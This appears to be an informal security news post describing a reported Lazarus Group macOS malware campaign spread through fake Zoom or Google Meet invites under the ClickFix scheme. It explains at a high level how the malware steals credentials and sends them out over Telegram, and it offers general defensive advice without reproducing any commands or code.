Just caught up on something that's been making rounds in security circles and it's worth paying attention to if you're in the crypto space. Researchers have confirmed that Lazarus Group—the North Korea-linked outfit that's been behind some of the biggest crypto heists—is running a fresh macOS malware campaign. This one's called Mach-O Man, and it's being distributed through something called ClickFix, a social engineering framework that's casting a pretty wide net across both traditional businesses and crypto companies.

Here's what's actually happening: victims get what looks like a legitimate calendar invite for a Zoom or Google Meet call. Seems normal, right? But once they click through, they're prompted to run some commands that quietly pull down the malware in the background. It's clever because it bypasses a lot of standard security controls that most people rely on. The whole thing is designed to harvest credentials, browser data, cookies, and keychain entries—basically anything valuable sitting on your machine. Once it grabs everything, it zips it up and ships it out through Telegram before deleting itself completely.

What's worth noting here is that this isn't just about crypto anymore. Lazarus has been steadily broadening its target scope over the past several months. We saw them breach Zerion back in April using AI-enhanced social engineering to grab team credentials and private keys. Before that, there was the major exchange breach in 2025 that hit for $1.4 billion—still one of the largest crypto losses on record. The pattern is clear: they're getting more sophisticated and more ambitious.

The macOS angle is particularly interesting because a lot of security teams have historically focused more on Windows environments. That's left some gaps, especially around application controls and user awareness on Apple systems. Lazarus has clearly noticed this and is exploiting it.

For anyone running a crypto business or managing sensitive infrastructure, this is a wake-up call. The combination of social engineering plus credential theft remains one of the hardest attack vectors to defend against. If you're not already thinking about least-privilege access, application allowlists, and monitoring for weird download-and-execute sequences, now's the time. Also worth reviewing what data might be leaking through unexpected channels like Telegram.

The broader takeaway: even as crypto-specific threats remain in the headlines, attackers are expanding their reach across sectors. That means the attack surface for exchanges, custodians, and infrastructure providers just keeps growing. Keep watching this space—we'll probably see new variants of this malware pop up with even more evasion tricks. The convergence of social engineering, automated credential theft, and self-deletion is becoming a real problem for defenders across the industry.